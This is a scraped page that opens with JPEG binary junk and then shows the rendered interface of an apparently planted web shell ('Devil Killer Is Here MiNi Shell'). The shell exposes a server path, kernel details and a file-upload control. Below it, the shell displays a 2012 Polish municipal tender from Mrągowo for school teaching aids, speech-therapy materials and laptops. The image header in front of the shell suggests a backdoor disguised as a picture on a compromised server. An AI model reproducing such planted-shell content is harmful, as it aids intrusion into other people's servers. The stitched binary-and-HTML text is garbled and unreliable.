JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120111/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120111/10271-N-2012.html

<p class="kh_header"><b>Mrągowo: Doposażenie szkół w sprzęt i pomoce dydaktyczne w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I  III szkół podstawowych Gminy  Mrągowo, realizowanego przez Gminę Mrągowo w ramach POKL  Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnianie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 10271 - 2012; data zamieszczenia: 11.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowy Zespół Ekonomiczno-Administracyjny Szkół Gminy Mrągowo z siedzibą w Marcinkowie , Marcinkowo 21, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 89 741 87 41, faks 89 741 87 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gminamragowo.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Doposażenie szkół w sprzęt i pomoce dydaktyczne w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I  III szkół podstawowych Gminy  Mrągowo, realizowanego przez Gminę Mrągowo w ramach POKL  Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnianie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest dostawa nowych pomocy dydaktycznych oraz sprzętu multimedialnego opisanych w poniższych częściach. CZĘŚĆ I  POMOCE DYDAKTYCZNE L.p. OPIS PRZEDMIOTU ZAMÓWIENIA 
I część  POMOCE DYDAKTYCZNE 
Pakiet czytanie i pisanie EduSensus dysleksja, zestaw kontrolny Pus.  Łatwe ćwiczenia do nauki czytania cz. 1. Łatwe ćwiczenia do nauki czytania cz. 2. Łatwe ćwiczenia do nauki czytania cz. 3. Łatwe ćwiczenia do nauki czytania cz. 4. Wyliczanki  zgadywanki. Pajacyk  odkrywanie stron ciała. Dźwięki wokół nas. Bajki  słuchaj i układaj obrazki. Zabawy słuchowe.  Ćwiczenia dla uczniów klas 0 i I III. Trening słuchu.  Ćwiczenia  rozwijające percepcję słuchową u dzieci.
Obrazkowe rytmy. Mozaika w drewnianym pudełku. Logiczne układanki.
Gimnastyka buzi i języka. Karty do ćwiczeń motoryki narządów artykulacyjnych. Litery dotykowe małe. Litery dotykowe duże. Alfabet z obrazkami. Trudne litery.  Perskie oko.  Ćwiczenia percepcji wzrokowej dla dzieci w młodszym wieku szkolnym. Kto to. Co to. Rzeczownik . Czasownik  Co robi. Co się z nim dzieje. Terapia dzieci zagrożonych dysleksją. Stymulacja lewej półkuli mózgu. Tabliczka ze szlaczkami  4 pakiety.
Pomoce do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
Pakiet Matematyka jednostanowiskowa EduRom Gra matematyczna Fabryka zabawek,  EduRom Gra matematyczna Stare zamczysko, EduRom Gra matematyczna Niezwykłe wakacje,
Geometryczne kształty drewniane. Karty zadań. Zestaw matematyczny  Abak do sortowania. Guziki matematyczne. Kołeczki i cyferki.  Cyfry dotykowe. Zbiory i liczby. Bingo. Nauka cyfr od 1 do 10. Kolorowe figury. Plansza z zadaniami. Kostki. Figury geometryczne w przestrzeni. Tabliczki i kształty czerwone. Waga matematyczna. Miarka 1 m. Taśma miarowa. Patyczaki. Klocki Bio.
Zestaw kontrolny PUS. Dreptuś matematyk 1. Dreptuś matematyk 2. Matematyka konkretna.
Symetria, miary, waga i pieniądze. Mozaika w drewnianym pudełku.
Siatka logicznych powiązań. Zestaw do nauki liczenia w zakresie 1  10. Dodawanie do 20  domino. Odejmowanie do 20  domino. Zegar stojący. Małe zegary edukacyjne. Relacje czasowe i przestrzenne. Kalendarz  4 pakiety.
Pomoce do prowadzenia zajęć logopedycznych dla dzieci z zaburzeniami mowy
Logopedia pakiet poszerzony:  Edusensu Logo gry.  Seria Stymulacja i terapia. Szeregi i sekwencje. Loteryjka obrazkowa gra logopedyczna. Pudełko z misiem.   Karty do pudełka z misiem. Zeszyt ćwiczeń logopedycznych s, z, c, dz. Zeszyt ćwiczeń logopedycznych  ż, sz, cz, dż.
Zestaw kontrolny PUS. Gramatyka na wesoło 1. Gramatyka na wesoło 2. Rzeczownik 1. Rzeczownik 2. Co robi. Co robią. Czasownik. Przymiotniki 1. Słowniczek frazeologiczny. Słowniczek wyrazów obcych. Słowniczek wyrazów bliskoznacznych. Chrząszcz z Żyrzyna. Chyża Żmija Syk Syk. Miała baba koguta. Kruk z Kruklanki. Kwestionariusz badania mowy. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek sz, ż, cz, dż. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek s, z, c, dz. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek p, pi, b, bi. Wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek detalizowanych. Słyszę i wymawiam. Ćwiczenia kinestezji artykulacyjnej. Suwaki terapeutyczne. Pociągi. Suwaki terapeutyczne. Tarcze. Suwaki terapeutyczne. Windy. Suwaki terapeutyczne. Gąsienice. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek f, fi, w, wi, ł, ch, h. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek t, d, m, mi, n, ni, ń.
Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek k, ki, g, gi. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek ś, ź, ć, dź. Cmokaj, dmuchaj, parskaj, Chuchaj. Bajeczki logopedyczne. Zabawne historyjki usprawniające mowę dziecka. Opowiedz o. Terapia zaburzeń mowy u dzieci z afazją, dysfazją dziecięcą lub opóźnionym rozwojem mowy.  Gimnastyka buzi i języka. Karty do ćwiczeń motoryki narządów artykulacyjnych.  Słowa i zdania. Kto to. Co to. Rzeczownik. Przedmioty  zdjęcia. Żywność  zdjęcia. Skojarzenia  zdjęcia. Ulubione zwierzęta  zdjęcia. Dziecięce ubrania  zdjęcia.  Przód, bok, tył  zdjęcia. Pacynki Małpka Czarodziejka, Głos Koguta. Zwierzęta i natura. Lotto dźwiękowe. Bajki  słuchaj i układaj obrazki. Turbinka  4 pakiety.
Pomoce do prowadzenia zajęć z gimnastyki korekcyjnej. Pakiet  do gimnastyki korekcyjnej. Materac 3 częściowy gimnastyka korekcyjna niebieski  kształtki rehabilitacyjne. Fakturowa ósemka.  Zestaw Alik  kształtki rehabilitacyjne. Skacząca planeta. Geo balance trójkąty. Geo balance kółka. Piłka fasolka 55 cm. Piłka do rytmiki 1 szt. Piłka skacząca 55 cm. Piłka 55 cm.Piłka skacząca 65 cm. Mini szczudła 16 cm. Mini szczudła 12 cm. Worki do skakania 4 szt. Zestaw gimnastyczny. Tunel Zyg Zag. Jajo równoważne. Talerz cyrkowy. Obręcze cyrkowe 2 szt. Piłeczki do żonglowania miękkie. Tańczące szale. Maxi roller. Wstążki gimnastyczne  4 pakiety.
Moja pierwsza chemia   4 zestawy.
Laboratorium astronomiczne 4 zestawy.
Eksperymenty z botaniki  4 zestawy.
Tułów człowieka  4 sztuki.
Mikroskop jajo  4 sztuki

CZĘŚĆ II  SPRZĘT MULTIMEDIALNY L.p OPIS PRZEDMIOTU ZAMÓWIENIA
Laptop
Procesor osiągający minimum 1500 pkt CPU pkt CPU Mark PassMark
Przekątna  ekranu minimum 15,6
Rozdzielczość natywna matrycy minimum 1366 x 768 pikseli 
Wielkość pamięci RAM minimum 4 GB 
Dysk twardy minimum 250 GB 
System operacyjny w wersji polskiej umożliwiający instalowanie i uruchamianie oprogramowania użytkowego i rozrywkowego dla systemu MS Windows
Napęd DVD RW 
Wyjście HDMI
Gwarancja producenta minimum 24 miesiące
Mysz USB  optyczna z krótkim kablem do laptopów
Torba do przenoszenia  4 sztuki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 38.65.21.00-1, 39.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Złożenie: 1. Oświadczenia. Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Złożenie: 1. Oświadczenia. Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Złożenie: 1. Oświadczenia. Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Złożenie: 1. Oświadczenia. Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Złożenie: 1. Oświadczenia. Zamawiający dokona oceny spełnienia warunku na podstawie złożonych dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego do oferty należy dołączyć specyfikację oferowanego sprzętu, pomocy (wraz z cenami) w formie załącznika do oferty.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zmiana, o której mowa w zdaniu 1 jest możliwa w warunkach: 1. zaistnienia siły wyższej to jest zdarzenia, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub całości jego zobowiązań, poprzez przedłużenie terminu wykonania zobowiązania o czas trwania siły wyższej lub zawieszenia umowy. Siła wyższa obejmuje w szczególności, następujące zdarzenia: a) wojna, działania wojenne, działania wrogów zewnętrznych; b) terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa; c) skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywne, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę; d) klęski żywiołowe, jak huragany, powodzie, trzęsienie ziemi; e) inne wydarzenia losowe.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminamragowo.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samorządowy Zespół Ekonomiczno - Administracyjny Szkół Gminy Mrągowo zs. w Marcinkowie, Marcinkowo 21,  11-700 Mrągowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 10:30, miejsce: Samorządowy Zespół Ekonomiczno - Administracyjny Szkół Gminy Mrągowo zs. w Marcinkowie, Marcinkowo 21,  11-700 Mrągowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I część - POMOCE DYDAKTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I część  POMOCE DYDAKTYCZNE 
lp.	Opis przedmiotu zamówienia	Ilość 
Pomoce do prowadzenia zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji 
1.	Pakiet czytanie i pisanie: EduSensus dysleksja, zestaw kontrolny Pus.  Łatwe ćwiczenia do nauki czytania cz. 1. Łatwe ćwiczenia do nauki czytania cz. 2. Łatwe ćwiczenia do nauki czytania cz. 3. Łatwe ćwiczenia do nauki czytania cz. 4. Wyliczanki - zgadywanki. Pajacyk  odkrywanie stron ciała. Dźwięki wokół nas. Bajki  słuchaj i układaj obrazki. Zabawy słuchowe.  Ćwiczenia dla uczniów klas 0 i I III. Trening słuchu.  Ćwiczenia  rozwijające percepcję słuchową u dzieci.
Obrazkowe rytmy. Mozaika w drewnianym pudełku. Logiczne układanki.
 Gimnastyka buzi i języka. Karty do ćwiczeń motoryki narządów artykulacyjnych. Litery dotykowe małe. Litery dotykowe duże. Alfabet z obrazkami. Trudne litery.  Perskie oko.  Ćwiczenia percepcji wzrokowej dla dzieci w młodszym wieku szkolnym. Kto to? Co to? Rzeczownik . Czasownik - Co robi? Co się z nim dzieje? Terapia dzieci zagrożonych dysleksją. Stymulacja lewej półkuli mózgu. Tabliczka ze szlaczkami.	4 pakiety
Pomoce do prowadzenia zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
2.	 Pakiet: Matematyka jednostanowiskowa EduRom Gra matematyczna Fabryka zabawek,  EduRom Gra matematyczna Stare zamczysko, EduRom Gra matematyczna Niezwykłe wakacje,
 Geometryczne kształty drewniane. Karty zadań. Zestaw matematyczny  Abak do sortowania. Guziki matematyczne. Kołeczki i cyferki.  Cyfry dotykowe. Zbiory i liczby. Bingo. Nauka cyfr od 1 do 10. Kolorowe figury. Plansza z zadaniami. Kostki. Figury geometryczne w przestrzeni. Tabliczki i kształty czerwone. Waga matematyczna. Miarka 1 m. Taśma miarowa. Patyczaki. Klocki Bio.
Zestaw kontrolny PUS. Dreptuś matematyk 1. Dreptuś matematyk 2. Matematyka konkretna.
Symetria, miary, waga i pieniądze. Mozaika w drewnianym pudełku.
Siatka logicznych powiązań. Zestaw do nauki liczenia w zakresie 1  10. Dodawanie do 20 - domino. Odejmowanie do 20  domino. Zegar stojący. Małe zegary edukacyjne. Relacje czasowe i przestrzenne. Kalendarz.	4 pakiety
Pomoce do prowadzenia zajęć logopedycznych dla dzieci z zaburzeniami mowy 
3.	Logopedia pakiet poszerzony:  Edusensu Logo gry.  Seria  Stymulacja i terapia. Szeregi i sekwencje. Loteryjka obrazkowa gra logopedyczna. Pudełko z misiem.   Karty do pudełka z misiem. Zeszyt ćwiczeń logopedycznych s, z, c, dz. Zeszyt ćwiczeń logopedycznych  ż, sz, cz, dż.
 Zestaw kontrolny PUS. Gramatyka na wesoło 1. Gramatyka na wesoło 2. Rzeczownik 1. Rzeczownik 2. Co robi? Co robią? Czasownik. Przymiotniki 1. Słowniczek frazeologiczny. Słowniczek wyrazów obcych. Słowniczek wyrazów bliskoznacznych. Chrząszcz z Żyrzyna. Chyża Żmija Syk Syk. Miała baba koguta. Kruk z Kruklanki. Kwestionariusz badania mowy. Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek sz, ż, cz, dż. Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek s, z, c, dz. Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek p, pi, b, bi. Wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek detalizowanych. Słyszę i wymawiam. Ćwiczenia kinestezji artykulacyjnej. Suwaki terapeutyczne. Pociągi. Suwaki terapeutyczne. Tarcze. Suwaki terapeutyczne. Windy. Suwaki terapeutyczne. Gąsienice. Materiał wyrazowo-obrazkowy do utrwalania poprawnej wymowy głosek f, fi, w, wi, ł, ch ,h. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek t, d, m, mi, n, ni ,ń.
Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek k, ki, g, gi. Materiał wyrazowo obrazkowy do utrwalania poprawnej wymowy głosek ś, ź, ć, dź. Cmokaj, dmuchaj, parskaj, Chuchaj. Bajeczki logopedyczne. Zabawne historyjki usprawniające mowę dziecka. Opowiedz o. Terapia zaburzeń mowy u dzieci z afazją, dysfazją dziecięcą lub opóźnionym rozwojem mowy.  Gimnastyka buzi i języka. Karty do ćwiczeń motoryki narządów artykulacyjnych.  Słowa i zdania. Kto to? Co to? Rzeczownik. Przedmioty  zdjęcia. Żywność  zdjęcia. Skojarzenia zdjęcia. Ulubione zwierzęta  zdjęcia. Dziecięce ubrania  zdjęcia.  Przód, bok, tył  zdjęcia. Pacynki Małpka Czarodziejka, Głos Koguta. Zwierzęta i natura. Lotto dźwiękowe. Bajki  słuchaj i układaj obrazki. Turbinka.	4 pakiety
Pomoce do prowadzenia zajęć z gimnastyki korekcyjnej
